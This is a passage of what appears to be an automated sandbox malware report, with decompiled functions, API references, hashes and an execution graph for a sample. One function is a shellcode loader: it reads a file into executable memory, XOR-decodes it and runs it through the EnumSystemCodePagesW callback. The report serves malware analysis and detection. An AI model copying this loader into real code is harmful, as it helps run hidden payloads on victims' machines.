				 *((intOrPtr*)(E00E11CD3())) = 0x16;
				goto L4;
			}




























              0x00e112cc
              0x00e112cf
              0x00e112d5
              0x00e112d8
              0x00e112db
              0x00e112f8
              0x00000000
              0x00e112f8
              0x00e112dd
              0x00e112e2
              0x00000000
              0x00000000
              0x00e112e6
              0x00e11301
              0x00e11304
              0x00e11306
              0x00e11314
              0x00e11314
              0x00e11318
              0x00e11320
              0x00e11325
              0x00e11325
              0x00e11328
              0x00e1132a
              0x00000000
              0x00e1132c
              0x00e1132c
              0x00e11334
              0x00e11336
              0x00000000
              0x00000000
              0x00e11338
              0x00e1133b
              0x00e1133e
              0x00e11345
              0x00e11347
              0x00e1134e
              0x00e11349
              0x00e11349
              0x00e11349
              0x00e11353
              0x00e11356
              0x00e11358
              0x00e11441
              0x00000000
              0x00e1135e
              0x00e1135e
              0x00e1135e
              0x00e11365
              0x00e113a6
              0x00e113a6
              0x00e113a8
              0x00e11413
              0x00e11419
              0x00e1141c
              0x00e11473
              0x00000000
              0x00e11479
              0x00e1141e
              0x00e11421
              0x00e11423
              0x00e11449
              0x00e11449
              0x00e1144d
              0x00e11457
              0x00e1145c
              0x00e11464
              0x00e112f3
              0x00e112f3
              0x00000000
              0x00e112f3
              0x00e11425
              0x00e11428
              0x00e1142b
              0x00e1142c
              0x00e1142f
              0x00e1142f
              0x00e11430
              0x00e11433
              0x00e11436
              0x00000000
              0x00e11436
              0x00e113aa
              0x00e113ac
              0x00e113d0
              0x00e113d5
              0x00e113db
              0x00e113dd
              0x00e113dd
              0x00e113ae
              0x00e113b0
              0x00e113b6
              0x00e113c8
              0x00e113c8
              0x00e113c8
              0x00e113ca
              0x00e113b8
              0x00e113bd
              0x00e113bf
              0x00e113bf
              0x00e113cc
              0x00e113cc
              0x00e113df
              0x00e113e2
              0x00000000
              0x00e113e4
              0x00e113e4
              0x00e113e5
              0x00e113ef
              0x00e113f0
              0x00e113f5
              0x00e113f8
              0x00e113fa
              0x00e11481
              0x00000000
              0x00e11481
              0x00e11400
              0x00e11403
              0x00e1146f
              0x00e1146f
              0x00e1146f
              0x00e1146f
              0x00000000
              0x00e1146f
              0x00e11405
              0x00e11405
              0x00e11407
              0x00e11407
              0x00e1140a
              0x00e1140d
              0x00000000
              0x00e1140d
              0x00e113e2
              0x00e11367
              0x00e1136a
              0x00e1136d
              0x00e1136f
              0x00000000
              0x00000000
              0x00e11371
              0x00000000
              0x00000000
              0x00e11377
              0x00e11379
              0x00e1137b
              0x00e1137d
              0x00e1137d
              0x00e11380
              0x00e11383
              0x00e11385
              0x00000000
              0x00e1138b
              0x00e11392
              0x00e11397
              0x00e1139a
              0x00e1139d
              0x00e113a0
              0x00e113a2
              0x00000000
              0x00e113a2
              0x00e11439
              0x00e11439
              0x00e11439
              0x00000000
              0x00e1135e
              0x00e11358
              0x00e1132a
              0x00e1130d
              0x00e11310
              0x00e11312
              0x00000000
              0x00000000
              0x00000000
              0x00e11312
              0x00e112e8
              0x00e112ed
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
              • String ID:
              • API String ID: 1559183368-0
              • Opcode ID: 7c50b4eb4434fc4256cde1d31d00baebc1c3adbb103b0cf6c9c41cc636181b55
              • Instruction ID: db6e97dcb2303dbdc70d5a3b8f4296e61b3e584acf5095c4c76aafe3c8e9ab21
              • Opcode Fuzzy Hash: 7c50b4eb4434fc4256cde1d31d00baebc1c3adbb103b0cf6c9c41cc636181b55
              • Instruction Fuzzy Hash: 6551E770A00305DBCB249FA9C8806EEB7A6AF40724F2493ADFA35B66D4D7709DD0DB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E17462 Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 95%
              			E00E17462(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
				void* _t7;
				void* _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				void* _t20;
				long _t31;

				if(_a4 != 0) {
					_t31 = _a8;
					if(_t31 != 0) {
						_push(__ebx);
						while(_t31 <= 0xffffffe0) {
							if(_t31 == 0) {
								_t31 = _t31 + 1;
							}
							_t7 = HeapReAlloc( *0xe24834, 0, _a4, _t31);
							_t20 = _t7;
							if(_t20 != 0) {
								L17:
								_t8 = _t20;
							} else {
								if( *0xe24830 == _t7) {
									_t9 = E00E11CD3();
									 *_t9 = E00E11CE6(GetLastError());
									goto L17;
								} else {
									if(E00E11751(_t7, _t31) == 0) {
										_t12 = E00E11CD3();
										 *_t12 = E00E11CE6(GetLastError());
										L12:
										_t8 = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00E11751(_t6, _t31);
						 *((intOrPtr*)(E00E11CD3())) = 0xc;
						goto L12;
					} else {
						E00E14841(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E00E11151(__ebx, __edx, __edi, _a8);
				}
			}









              0x00e17469
              0x00e17477
              0x00e1747c
              0x00e1748b
              0x00e174be
              0x00e17490
              0x00e17492
              0x00e17492
              0x00e1749f
              0x00e174a5
              0x00e174a9
              0x00e17509
              0x00e17509
              0x00e174ab
              0x00e174b1
              0x00e174f3
              0x00e17507
              0x00000000
              0x00e174b3
              0x00e174bc
              0x00e174db
              0x00e174ef
              0x00e174d5
              0x00e174d5
              0x00000000
              0x00000000
              0x00000000
              0x00e174bc
              0x00e174b1
              0x00000000
              0x00e174d7
              0x00e174c4
              0x00e174cf
              0x00000000
              0x00e1747e
              0x00e17481
              0x00e17487
              0x00e17487
              0x00e174d8
              0x00e174da
              0x00e1746b
              0x00e17475
              0x00e17475

              APIs
              • _malloc.LIBCMT ref: 00E1746E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
              • _free.LIBCMT ref: 00E17481
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: AllocHeap_free_malloc
              • String ID:
              • API String ID: 2734353464-0
              • Opcode ID: 15eca442cf25a31ebedbe5a4455c0847769a77508672c6435afc8197461c9feb
              • Instruction ID: fdb8bdce638781f931dc4c01639e15a75793aeaff45d74b0f0adafd60c927542
              • Opcode Fuzzy Hash: 15eca442cf25a31ebedbe5a4455c0847769a77508672c6435afc8197461c9feb
              • Instruction Fuzzy Hash: AA11E77190D2196FCB352F75AC447DA3EE46F04764B206565FA99B6290DA3088C086D0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E11000 Relevance: 7.6, APIs: 5, Instructions: 59memoryCOMMON
              Download Yara Rule
              C-Code - Quality: 92%
              			E00E11000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				void* _t23;
				_Unknown_base(*)()* _t24;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr* _t37;

				_push(_t23);
				_t31 = 0;
				_t6 = E00E11151(_t23, _t29, 0, 0x17d78400);
				 *_t37 = 0xe23000;
				_v8 = _t6;
				_t7 = E00E111E3(_a12, _t30);
				_t24 = VirtualAlloc(0, 0x148a, 0x3000, 0x40);
				E00E11487(_t24, 0x148a, 1, _t7);
				_t10 = _v8;
				if(_v8 != 0) {
					E00E11540(_t10, 0xcb, 0x17d78400);
					do {
						 *(_t24 + _t31) = (((( *(_t24 + _t31) ^ 0x0000009d) + 0x00000001 ^ 0x000000d0) + 0x0000007f ^ 0x000000c5) + 0x00000001 ^ 0x000000b7) + 0x32;
						_t31 = _t31 + 1;
					} while (_t31 < 0x148a);
					EnumSystemCodePagesW(_t24, 0);
				}
				return 0;
			}














              0x00e11004
              0x00e1100c
              0x00e1100e
              0x00e11013
              0x00e1101d
              0x00e11020
              0x00e11044
              0x00e11048
              0x00e1104d
              0x00e11055
              0x00e11062
              0x00e1106a
              0x00e1107d
              0x00e11080
              0x00e11081
              0x00e11088
              0x00e11088
              0x00e11094

              APIs
              • _malloc.LIBCMT ref: 00E1100E
                • Part of subcall function 00E11151: __FF_MSGBANNER.LIBCMT ref: 00E11168
                • Part of subcall function 00E11151: __NMSG_WRITE.LIBCMT ref: 00E1116F
                • Part of subcall function 00E11151: HeapAlloc.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,?,00E148D7,00000000,00000000,00000000,00000000,?,00E14509,00000018,00E22280), ref: 00E11194
                • Part of subcall function 00E111E3: __wfsopen.LIBCMT ref: 00E111EE
              • VirtualAlloc.KERNEL32(00000000,0000148A,00003000,00000040), ref: 00E11036
              • __fread_nolock.LIBCMT ref: 00E11048
              • _memset.LIBCMT ref: 00E11062
              • EnumSystemCodePagesW.KERNEL32(00000000,00000000), ref: 00E11088
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: Alloc$CodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
              • String ID:
              • API String ID: 612201108-0
              • Opcode ID: 86ec7bcd859673f0f6056ce5c6470ecdf3db13715ee95db9774d54a5a9b1f81c
              • Instruction ID: 5c372068dd45a11ccc246e57f51a2a34b8f7bc3f86af1f7d8f098d327493c5ed
              • Opcode Fuzzy Hash: 86ec7bcd859673f0f6056ce5c6470ecdf3db13715ee95db9774d54a5a9b1f81c
              • Instruction Fuzzy Hash: 2B014C71A053047BF72027715C4BFDF7B98DB55758F201491FA01B7182E5F499829274
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E18BD1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00E18BD1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0xe224b0);
				_t4 = E00E12410(__ebx, __edi, __esi);
				_t17 =  *0xe23d3c - 0xe23d40; // 0xe23d40
				if(_t17 != 0) {
					E00E1443F(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0xe23d3c = E00E173E6("@=\xef\xbf\xbd", 0x					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E00E18C1A();
				}
				return E00E12455(_t4);
			}






              0x00e18bd1
              0x00e18bd3
              0x00e18bd8
              0x00e18be2
              0x00e18be8
              0x00e18bec
              0x00e18bf2
              0x00e18c03
              0x00e18c08
              0x00e18c0f
              0x00e18c0f
              0x00e18c19

              APIs
              • __lock.LIBCMT ref: 00E18BEC
                • Part of subcall function 00E1443F: __mtinitlocknum.LIBCMT ref: 00E14451
                • Part of subcall function 00E1443F: EnterCriticalSection.KERNEL32(00000000,?,00E137BB,0000000D), ref: 00E1446A
              • __updatetlocinfoEx_nolock.LIBCMT ref: 00E18BFC
                • Part of subcall function 00E173E6: ___addlocaleref.LIBCMT ref: 00E17402
                • Part of subcall function 00E173E6: ___removelocaleref.LIBCMT ref: 00E1740D
                • Part of subcall function 00E173E6: ___freetlocinfo.LIBCMT ref: 00E17421
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
              • String ID: @=$@=
              • API String ID: 547918592-965070868
              • Opcode ID: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction ID: 42f03b9cd0e85821d495f9703154dc4d23cab859f8ab9fe07709a741ef8f1e57
              • Opcode Fuzzy Hash: c88c94099e2aede67bb4eb9d19a68137be84662e34fdd79b24ed1f6460fa45f0
              • Instruction Fuzzy Hash: 8CE08671545320EAD6207B717D43BCCF2F05B00B25F50751AF164771C1CD785AC05EA2
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00E1A95D Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
              Download Yara Rule
              C-Code - Quality: 100%
              			E00E1A95D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00E1AEAE(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00E1A9E3(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00E1B129(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00E1B068(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





              0x00e1a960
              0x00e1a966
              0x00e1a9d9
              0x00000000
              0x00e1a96d
              0x00e1a96d
              0x00e1a970
              0x00e1a98b
              0x00e1a98e
              0x00e1a9ae
              0x00e1a9c0
              0x00e1a990
              0x00e1a990
              0x00e1a993
              0x00000000
              0x00e1a995
              0x00e1a9a7
              0x00e1a9a7
              0x00e1a993
              0x00e1a9de
              0x00e1a9e2
              0x00e1a972
              0x00e1a98a
              0x00e1a98a
              0x00e1a970

              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.303284968.0000000000E11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00E10000, based on PE: true
              • Associated: 00000002.00000002.303278497.0000000000E10000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303298598.0000000000E1E000.00000002.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303307359.0000000000E23000.00000008.00000001.01000000.00000004.sdmpDownload File
              • Associated: 00000002.00000002.303314758.0000000000E27000.00000002.00000001.01000000.00000004.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_e10000_ronkhfyq.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction ID: 489854a5261fd241575a117183a2f0aa3d04ed14917c035307d5b41b11fa13ae
              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
              • Instruction Fuzzy Hash: 6B014C7204114EFBCF125E84DC018EE3F67BB58354B5A9425FE1868031C336C9F1AB82
              Uniqueness

              Uniqueness Score: -1.00%

              Execution Graph

              Execution Coverage:5.8%
              Dynamic/Decrypted Code Coverage:2%
              Signature Coverage:0%
              Total number of Nodes:708
              Total number of Limit Nodes:87
              execution_graph 26613 4c09540 LdrInitializeThunk 26616 2eff26d 26619 2efba60 26616->26619 26620 2efba86 26619->26620 26627 2ee9150 26620->26627 26622 2efba92 26625 2efbab6 26622->26625 26635 2ee8440 26622->26635 26667 2efa660 26625->26667 26628 2ee915d 26627->26628 26670 2ee90a0 26627->26670 26630 2ee9164 26628->26630 26682 2ee9040 26628->26682 26630->26622 26636 2ee8467 26635->26636 27103 2eea600 26636->27103 26638 2ee8479 27107 2eea350 26638->27107 26640 2ee8496 26647 2ee849d 26640->26647 27160 2eea280 LdrLoadDll 26640->27160 26642 2ee85e4 26642->26625 26644 2ee8506 26644->26642 26645 2efc0b0 2 API calls 26644->26645 26646 2ee851c 26645->26646 26648 2efc0b0 2 API calls 26646->26648 26647->26642 27111 2eed760 26647->27111 26649 2ee852d 26648->26649 26650 2efc0b0 2 API calls 26649->26650 26651 2ee853e 26650->26651 27123 2eeb4c0 26651->27123 26653 2ee8551 26654 2ef5690 9 API calls 26653->26654 26655 2ee8562 26654->26655 26656 2ef5690 9 API calls 26655->26656 26657 2ee8573 26656->26657 26658 2ee8593 26657->26658 27135 2eec030 26657->27135 26660 2ef5690 9 API calls 26658->26660 26663 2ee85db 26658->26663 26665 2ee85aa 26660->26665 27141 2ee8220 26663->27141 26665->26663 27162 2eec0d0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 26665->27162 26668 2efaf60 LdrLoadDll 26667->26668 26669 2efa67f 26668->26669 26701 2ef8b80 26670->26701 26674 2ee90c6 26674->26628 26675 2ee90bc 26675->26674 26708 2efb310 26675->26708 26677 2ee9103 26677->26674 26719 2ee8ec0 26677->26719 26679 2ee9123 26725 2ee8920 LdrLoadDll 26679->26725 26681 2ee9135 26681->26628 26683 2ee905a 26682->26683 26684 2efb600 LdrLoadDll 26682->26684 27077 2efb600 26683->27077 26684->26683 26687 2efb600 LdrLoadDll 26688 2ee9081 26687->26688 26689 2eed560 26688->26689 26690 2eed579 26689->26690 27086 2eea480 26690->27086 26692 2eed58c 27090 2efa190 26692->27090 26695 2ee9175 26695->26622 26697 2eed5b2 26698 2eed5dd 26697->26698 27096 2efa210 26697->27096 26700 2efa440 2 API calls 26698->26700 26700->26695 26702 2ef8b8f 26701->26702 26726 2ef5a90 26702->26726 26704 2ee90b3 26705 2ef8a30 26704->26705 26732 2efa5b0 26705->26732 26709 2efb329 26708->26709 26739 2ef5690 26709->26739 26711 2efb341 26712 2efb34a 26711->26712 26778 2efb150 26711->26778 26712->26677 26714 2efb35e 26714->26712 26795 2ef9eb0 26714->26795 27055 2ee7210 26719->27055 26721 2ee8ee1 26721->26679 26722 2ee8eda 26722->26721 27068 2ee74d0 26722->27068 26725->26681 26727 2ef5a9e 26726->26727 26728 2ef5aaa 26726->26728 26727->26728 26731 2ef5f10 LdrLoadDll 26727->26731 26728->26704 26730 2ef5bfc 26730->26704 26731->26730 26735 2efaf60 26732->26735 26734 2ef8a45 26734->26675 26736 2efaf6f 26735->26736 26738 2efafe5 26735->26738 26737 2ef5a90 LdrLoadDll 26736->26737 26736->26738 26737->26738 26738->26734 26740 2ef59c5 26739->26740 26741 2ef56a4 26739->26741 26740->26711 26741->26740 26803 2ef9c00 26741->26803 26744 2ef57b3 26863 2efa410 LdrLoadDll 26744->26863 26745 2ef57d0 26806 2efa310 26745->26806 26748 2ef57f7 26750 2efbee0 2 API calls 26748->26750 26749 2ef57bd 26749->26711 26754 2ef5803 26750->26754 26751 2ef5989 26752 2efa440 2 API calls 26751->26752 26755 2ef5990 26752->26755 26753 2ef599f 26872 2ef53d0 LdrLoadDll NtReadFile NtReadFile NtClose 26753->26872 26754->26749 26754->26751 26754->26753 26758 2ef5892 26754->26758 26755->26711 26757 2ef59b2 26757->26711 26759 2ef58f9 26758->26759 26761 2ef58a1 26758->26761 26759->26751 26760 2ef590c 26759->26760 26865 2efa290 26760->26865 26763 2ef58ba 26761->26763 26764 2ef58a6 26761->26764 26767 2ef58bf 26763->26767 26768 2ef58d7 26763->26768 26864 2ef5290 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 26764->26864 26809 2ef5330 26767->26809 26768->26755 26821 2ef5050 26768->26821 26771 2ef58b0 26771->26711 26772 2ef58cd 26772->26711 26774 2ef596c 26869 2efa440 26774->26869 26775 2ef58ef 26775->26711 26777 2ef5978 26777->26711 26779 2efb16b 26778->26779 26780 2efb17d 26779->26780 26893 2efbe60 26779->26893 26780->26714 26782 2efb19d 26896 2ef4cb0 26782->26896 26784 2efb1c0 26784->26780 26785 2ef4cb0 3 API calls 26784->26785 26787 2efb1e2 26785->26787 26787->26780 26928 2ef5fd0 26787->26928 26788 2efb26a 26789 2efb27a 26788->26789 27023 2efaee0 LdrLoadDll 26788->27023 26939 2efad50 26789->26939 26792 2efb2a8 27018 2ef9e70 26792->27018 26796 2ef9ecc 26795->26796 26797 2efaf60 LdrLoadDll 26795->26797 27049 4c0967a 26796->27049 26797->26796 26798 2ef9ee7 26800 2efbee0 26798->26800 27052 2efa620 26800->27052 26802 2efb3b9 26802->26677 26804 2efaf60 LdrLoadDll 26803->26804 26805 2ef5784 26804->26805 26805->26744 26805->26745 26805->26749 26807 2efa32c NtCreateFile 26806->26807 26808 2efaf60 LdrLoadDll 26806->26808 26807->26748 26808->26807 26810 2ef534c 26809->26810 26811 2efa290 LdrLoadDll 26810->26811 26812 2ef536d 26811->26812 26813 2ef5388 26812->26813 26814 2ef5374 26812->26814 26816 2efa440 2 API calls 26813->26816 26815 2efa440 2 API calls 26814->26815 26817 2ef537d 26815->26817 26818 2ef5391 26816->26818 26817->26772 26873 2efc0f0 26818->26873 26820 2ef539c 26820->26772 26822 2ef50ce 26821->26822 26823 2ef509b 26821->26823 26825 2ef5219 26822->26825 26829 2ef50ea 26822->26829 26824 2efa290 LdrLoadDll 26823->26824 26826 2ef50b6 26824->26826 26827 2efa290 LdrLoadDll 26825->26827 26828 2efa440 2 API calls 26826->26828 26833 2ef5234 26827->26833 26830 2ef50bf 26828->26830 26831 2efa290 LdrLoadDll 26829->26831 26830->26775 26832 2ef5105 26831->26832 26835 2ef510c 26832->26835 26836 2ef5121 26832->26836 26892 2efa2d0 LdrLoadDll 26833->26892 26838 2efa440 2 API calls 26835->26838 26839 2ef513c 26836->26839 26840 2ef5126 26836->26840 26837 2ef526e 26842 2efa440 2 API calls 26837->26842 26843 2ef5115 26838->26843 26841 2ef5141 26839->26841 26879 2efc0b0 26839->26879 26844 2efa440 2 API calls 26840->26844 26846 2ef5153 26841->26846 26882 2efa3c0 26841->26882 26847 2ef5279 26842->26847 26843->26775 26845 2ef512f 26844->26845 26845->26775 26846->26775 26847->26775 26850 2ef51a7 26851 2ef51be 26850->26851 26891 2efa250 LdrLoadDll 26850->26891 26852 2ef51da 26851->26852 26853 2ef51c5 26851->26853 26856 2efa440 2 API calls 26852->26856 26855 2efa440 2 API calls 26853->26855 26855->26846 26857 2ef51e3 26856->26857 26858 2ef520f 26857->26858 26886 2efbcb0 26857->26886 26858->26775 26860 2ef51fa 26861 2efbee0 2 API calls 26860->26861 26862 2ef5203 26861->26862 26862->26775 26863->26749 26864->26771 26866 2ef5954 26865->26866 26867 2efaf60 LdrLoadDll 26865->26867 26868 2efa2d0 LdrLoadDll 26866->26868 26867->26866 26868->26774 26870 2efaf60 LdrLoadDll 26869->26870 26871 2efa45c NtClose 26870->26871 26871->26777 26872->26757 26875 2efc10a 26873->26875 26876 2efa5e0 26873->26876 26875->26820 26877 2efaf60 LdrLoadDll 26876->26877 26878 2efa5fc RtlAllocateHeap 26877->26878 26878->26875 26880 2efa5e0 2 API calls 26879->26880 26881 2efc0c8 26880->26881 26881->26841 26883 2efa3c6 26882->26883 26884 2efaf60 LdrLoadDll 26883->26884 26885 2efa3dc NtReadFile 26884->26885 26885->26850 26887 2efbcbd 26886->26887 26888 2efbcd4 26886->26888 26887->26888 26889 2efc0b0 2 API calls 26887->26889 26888->26860 26890 2efbceb 26889->26890 26890->26860 26891->26851 26892->26837 27024 2efa4f0 26893->27024 26895 2efbe8d 26895->26782 26897 2ef4cc1 26896->26897 26899 2ef4cc9 26896->26899 26897->26784 26898 2ef4f9c 26898->26784 26899->26898 27027 2efd090 26899->27027 26901 2ef4d1d 26902 2efd090 2 API calls 26901->26902 26905 2ef4d28 26902->26905 26903 2ef4d76 26906 2efd090 2 API calls 26903->26906 26905->26903 26907 2efd1c0 3 API calls 26905->26907 27041 2efd130 LdrLoadDll RtlAllocateHeap RtlFreeHeap 26905->27041 26909 2ef4d8a 26906->26909 26907->26905 26908 2ef4de7 26910 2efd090 2 API calls 26908->26910 26909->26908 27032 2efd1c0 26909->27032 26912 2ef4dfd 26910->26912 26913 2ef4e3a 26912->26913 26916 2efd1c0 3 API calls 26912->26916 26914 2efd090 2 API calls 26913->26914 26915 2ef4e45 26914->26915 26917 2efd1c0 3 API calls 26915->26917 26924 2ef4e7f 26915->26924 26916->26912 26917->26915 26920 2efd0f0 2 API calls 26921 2ef4f7e 26920->26921 26922 2efd0f0 2 API calls 26921->26922 26923 2ef4f88 26922->26923 26925 2efd0f0 2 API calls 26923->26925 27038 2efd0f0 26924->27038 26926 2ef4f92 26925->26926 26927 2efd0f0 2 API calls 26926->26927 26927->26898 26929 2ef5fe1 26928->26929 26930 2ef5690 9 API calls 26929->26930 26934 2ef5ff7 26930->26934 26931 2ef6000 26931->26788 26932 2ef6037 26933 2efbee0 2 API calls 26932->26933 26935 2ef6048 26933->26935 26934->26931 26934->26932 26936 2ef6083 26934->26936 26935->26788 26937 2efbee0 2 API calls 26936->26937 26938 2ef6088 26937->26938 26938->26788 27042 2efabe0 26939->27042 26941 2efad64 26942 2efabe0 LdrLoadDll 26941->26942 26943 2efad6d 26942->26943 26944 2efabe0 LdrLoadDll 26943->26944 26945 2efad76 26944->26945 26946 2efabe0 LdrLoadDll 26945->26946 26947 2efad7f 26946->26947 26948 2efabe0 LdrLoadDll 26947->26948 26949 2efad88 26948->26949 26950 2efabe0 LdrLoadDll 26949->26950 26951 2efad91 26950->26951 26952 2efabe0 LdrLoadDll 26951->26952 26953 2efad9d 26952->26953 26954 2efabe0 LdrLoadDll 26953->26954 26955 2efada6 26954->26955 26956 2efabe0 LdrLoadDll 26955->26956 26957 2efadaf 26956->26957 26958 2efabe0 LdrLoadDll 26957->26958 26959 2efadb8 26958->26959 26960 2efabe0 LdrLoadDll 26959->26960 26961 2efadc1 26960->26961 26962 2efabe0 LdrLoadDll 26961->26962 26963 2efadca 26962->26963 26964 2efabe0 LdrLoadDll 26963->26964 26965 2efadd6 26964->26965 26966 2efabe0 LdrLoadDll 26965->26966 26967 2efaddf 26966->26967 26968 2efabe0 LdrLoadDll 26967->26968 26969 2efade8 26968->26969 26970 2efabe0 LdrLoadDll 26969->26970 26971 2efadf1 26970->26971 26972 2efabe0 LdrLoadDll 26971->26972 26973 2efadfa 26972->26973 26974 2efabe0 LdrLoadDll 26973->26974 26975 2efae03 26974->26975 26976 2efabe0 LdrLoadDll 26975->26976 26977 2efae0f 26976->26977 26978 2efabe0 LdrLoadDll 26977->26978 26979 2efae18 26978->26979 26980 2efabe0 LdrLoadDll 26979->26980 26981 2efae21 26980->26981 26982 2efabe0 LdrLoadDll 26981->26982 26983 2efae2a 26982->26983 26984 2efabe0 LdrLoadDll 26983->26984 26985 2efae33 26984->26985 26986 2efabe0 LdrLoadDll 26985->26986 26987 2efae3c 26986->26987 26988 2efabe0 LdrLoadDll 26987->26988 26989 2efae48 26988->26989 26990 2efabe0 LdrLoadDll 26989->26990 26991 2efae51 26990->26991 26992 2efabe0 LdrLoadDll 26991->26992 26993 2efae5a 26992->26993 26994 2efabe0 LdrLoadDll 26993->26994 26995 2efae63 26994->26995 26996 2efabe0 LdrLoadDll 26995->26996 26997 2efae6c 26996->26997 26998 2efabe0 LdrLoadDll 26997->26998 26999 2efae75 26998->26999 27000 2efabe0 LdrLoadDll 26999->27000 27001 2efae81 27000->27001 27002 2efabe0 LdrLoadDll 27001->27002 27003 2efae8a 27002->27003 27004 2efabe0 LdrLoadDll 27003->27004 27005 2efae93 27004->27005 27006 2efabe0 LdrLoadDll 27005->27006 27007 2efae9c 27006->27007 27008 